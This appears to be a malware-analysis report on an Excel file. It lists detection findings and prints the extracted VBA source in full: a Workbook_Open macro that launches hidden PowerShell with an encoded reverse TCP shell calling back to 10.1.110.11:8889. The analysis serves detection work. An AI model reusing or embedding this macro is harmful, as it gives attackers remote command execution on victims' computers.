MALICIOUS
188
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
str = str + "AYwB0ACgAKQA7AAoAfQAKAA==" Shell (str) End Sub -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Dim str As String str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS" str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim str As String
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10589 bytes |
SHA-256: 11f06f73523311c961f65152e63fc5227164b52c8ca523d928597d4365c69995 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub ee()
Attribute ee.VB_ProcData.VB_Invoke_Func = " \n14"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim str As String
str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS"
str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
str = str + "jACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjA"
str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM"
str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI"
str = str + "wAjACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwB"
str = str + "yAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8"
str = str + "AdwBlAHIAUwBoAGUAbABsACAAUgBlAHYAZQByAHMAZQAgAFQAQ"
str = str + "wBQACAAdgAzAC4ANQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvA"
str = str + "HMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIABiAHkAIABJAHYAYQBuACAAUwB"
str = str + "pAG4AYwBlAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGk"
str = str + "AdABlAC0ASABvAHMAdAAgACIAIwAgAEcAaQB0AEgAdQBiACAAc"
str = str + "gBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQB"
str = str + "iAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwA"
str = str + "G8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQ"
str = str + "AYwBwAC4AIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAd"
str = str + "AAgACIAIwAgAEYAZQBlAGwAIABmAHIAZQBlACAAdABvACAAZAB"
str = str + "vAG4AYQB0AGUAIABiAGkAdABjAG8AaQBuACAAYQB0ACAAMQBCA"
str = str + "HIAWgBNADYAVAA3AEcAOQBSAE4AOAB2AGIAYQBiAG4AZgBYAHU"
str = str + "ANABNADYATABwAGcAegB0AHEANgBZADEANAAuACAAIAAgACMAI"
str = str + "gA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdAB"
str = str + "lAC0ASABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjA"
str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM"
str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI"
str = str + "wAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
str = str + "jACMAIwAjACMAIgA7AAoAJABjAGwAaQBlAG4AdAAgAD0AIAAkA"
str = str + "G4AdQBsAGwAOwAKACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHU"
str = str + "AbABsADsACgAkAGIAdQBmAGYAZQByACAAPQAgACQAbgB1AGwAb"
str = str + "AA7AAoAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAG4AdQBsAGwAOwA"
str = str + "KACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwAKACQAcgBlA"
str = str + "HMAdQBsAHQAIAA9ACAAJABuAHUAbABsADsACgB0AHIAeQAgAHs"
str = str + "ACgAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAd"
str = str + "AAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwB"
str = str + "yAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzA"
str = str + "GEAcgB5AAoACQAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0"
str = str + "ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMAL"
str = str + "gBUAGMAcABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAuADEAMQA"
str = str + "wAC4AMQAxACIALAAgADgAOAA4ADkAKQA7AAoACQAkAHMAdAByA"
str = str + "GUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQ"
str = str + "AcgBlAGEAbQAoACkAOwAKAAkAJABiAHUAZgBmAGUAcgAgAD0AI"
str = str + "ABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAA"
str = str + "xADAAMgA0ADsACgAJACQAZQBuAGMAbwBkAGkAbgBnACAAPQAgA"
str = str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBzAGM"
str = str + "AaQBpAEUAbgBjAG8AZABpAG4AZwA7AAoACQAkAHcAcgBpAHQAZ"
str = str + "QByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgB"
str = str + "TAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhA"
str = str + "G0AKQA7AAoACQAkAHcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGw"
str = str + "AdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsACgAJAFcAcgBpAHQAZ"
str = str + "QAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAGkAcwA"
str = str + "gAHUAcAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAuAC4ALgAiA"
str = str + "DsACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAKAAk"
str = str + "AJABiAHkAdABlAHMAIAA9ACAAMAA7AAoACQBkAG8AIAB7AAoAC"
str = str + "QAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA"
str = str + "+ACIAKQA7AAoACQAJAGQAbwAgAHsACgAJAAkACQAkAGIAeQB0A"
str = str + "GUAcwAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQ"
str = str + "AYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIAL"
str = str + "gBMAGUAbgBnAHQAaAApADsACgAJAAkACQBpAGYAIAAoACQAYgB"
str = str + "5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AAoACQAJAAkACQAkA"
str = str + "GQAYQB0AGEAIAA9ACAAJABkAGEAdABhACAAKwAgACQAZQBuAGM"
str = str + "AbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAd"
str = str + "QBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwApADsACgA"
str = str + "JAAkACQB9AAoACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0A"
str = str + "HIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACk"
str = str + "AOwAKAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAI"
str = str + "AAwACkAIAB7AAoACQAJAAkAJABkAGEAdABhACAAPQAgACQAZAB"
str = str + "hAHQAYQAuAFQAcgBpAG0AKAApADsACgAJAAkACQBpAGYAIAAoA"
str = str + "CQAZABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACk"
str = str + "AIAB7AAoACQAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAAkAJ"
str = str + "AByAGUAcwB1AGwAdAAgAD0AIABJAG4AdgBvAGsAZQAtAEUAeAB"
str = str + "wAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAkA"
str = str + "GQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHI"
str = str + "AaQBuAGcAOwAKAAkACQAJAAkAfQAgAGMAYQB0AGMAaAAgAHsAC"
str = str + "gAJAAkACQAJAAkAJAByAGUAcwB1AGwAdAAgAD0AIAAkAF8ALgB"
str = str + "FAHgAYwBlAHAAdABpAG8AbgAgAHwAIABPAHUAdAAtAFMAdAByA"
str = str + "GkAbgBnADsACgAJAAkACQAJAH0ACgAJAAkACQAJAEMAbABlAGE"
str = str + "AcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZ"
str = str + "ABhAHQAYQAiADsACgAJAAkACQAJACQAbABlAG4AZwB0AGgAIAA"
str = str + "9ACAAJAByAGUAcwB1AGwAdAAuAEwAZQBuAGcAdABoADsACgAJA"
str = str + "AkACQAJAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwB0ACA"
str = str + "AMAApACAAewAKAAkACQAJAAkACQAkAGMAbwB1AG4AdAAgAD0AI"
str = str + "AAwADsACgAJAAkACQAJAAkAZABvACAAewAKAAkACQAJAAkACQA"
str = str + "JAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwBlACAAJABiA"
str = str + "HUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAIAB7ACAAJABiAHk"
str = str + "AdABlAHMAIAA9ACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAd"
str = str + "ABoADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAGIAeQB0AGUAcwA"
str = str + "gAD0AIAAkAGwAZQBuAGcAdABoADsAIAB9AAoACQAJAAkACQAJA"
str = str + "AkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAcgBlAHM"
str = str + "AdQBsAHQALgBzAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAHUAb"
str = str + "gB0ACwAIAAkAGIAeQB0AGUAcwApACkAOwAKAAkACQAJAAkACQA"
str = str + "JACQAYwBvAHUAbgB0ACAAKwA9ACAAJABiAHkAdABlAHMAOwAKA"
str = str + "AkACQAJAAkACQAJACQAbABlAG4AZwB0AGgAIAAtAD0AIAAkAGI"
str = str + "AeQB0AGUAcwA7AAoACQAJAAkACQAJAH0AIAB3AGgAaQBsAGUAI"
str = str + "AAoACQAbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQA7AAoACQA"
str = str + "JAAkACQAJAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgA"
str = str + "C0ATgBhAG0AZQAgACIAcgBlAHMAdQBsAHQAIgA7AAoACQAJAAk"
str = str + "ACQB9AAoACQAJAAkAfQAKAAkACQB9AAoACQB9ACAAdwBoAGkAb"
str = str + "ABlACAAKAAkAGIAeQB0AGUAcwAgAC0AZwB0ACAAMAApADsACgA"
str = str + "JAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvA"
str = str + "G8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4"
str = str + "AIgA7AAoAfQAgAGMAYQB0AGMAaAAgAHsACgAJAFcAcgBpAHQAZ"
str = str + "QAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgA"
str = str + "uAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzA"
str = str + "HMAYQBnAGUAOwAKAH0AIABmAGkAbgBhAGwAbAB5ACAAewAKAAk"
str = str + "AaQBmACAAKAAkAHcAcgBpAHQAZQByACAALQBuAGUAIAAkAG4Ad"
str = str + "QBsAGwAKQAgAHsACgAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbAB"
str = str + "vAHMAZQAoACkAOwAKAAkACQAkAHcAcgBpAHQAZQByAC4ARABpA"
str = str + "HMAcABvAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGE"
str = str + "AcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHcAcgBpAHQAZ"
str = str + "QByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHMAdAByAGUAYQB"
str = str + "tACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABzA"
str = str + "HQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKAAkACQAkAHM"
str = str + "AdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwAKAAkAC"
str = str + "QBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQB"
str = str + "tAGUAIAAiAHMAdAByAGUAYQBtACIAOwAKAAkAfQAKAAkAaQBmA"
str = str + "CAAKAAkAGMAbABpAGUAbgB0ACAALQBuAGUAIAAkAG4AdQBsAGw"
str = str + "AKQAgAHsACgAJAAkAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZ"
str = str + "QAoACkAOwAKAAkACQAkAGMAbABpAGUAbgB0AC4ARABpAHMAcAB"
str = str + "vAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpA"
str = str + "GEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAbABpAGUAbgB0ACI"
str = str + "AOwAKAAkAfQAKAAkAaQBmACAAKAAkAGIAdQBmAGYAZQByACAAL"
str = str + "QBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABiAHUAZgB"
str = str + "mAGUAcgAuAEMAbABlAGEAcgAoACkAOwAKAAkACQBDAGwAZQBhA"
str = str + "HIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGI"
str = str + "AdQBmAGYAZQByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHIAZ"
str = str + "QBzAHUAbAB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgA"
str = str + "JAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOA"
str = str + "GEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsACgAJAH0ACgAJAGk"
str = str + "AZgAgACgAJABkAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAK"
str = str + "QAgAHsACgAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbAB"
str = str + "lACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwAKAAkAfQAKA"
str = str + "AkAWwBTAHkAcwB0AGUAbQAuAEcAQwBdADoAOgBDAG8AbABsAGU"
str = str + "AYwB0ACgAKQA7AAoAfQAKAA=="
Shell (str)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 49152 bytes |
SHA-256: afce4a1550db80c14dae7cf79b2c82a376a5d192b703fa0e26d539bb03d11b7b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.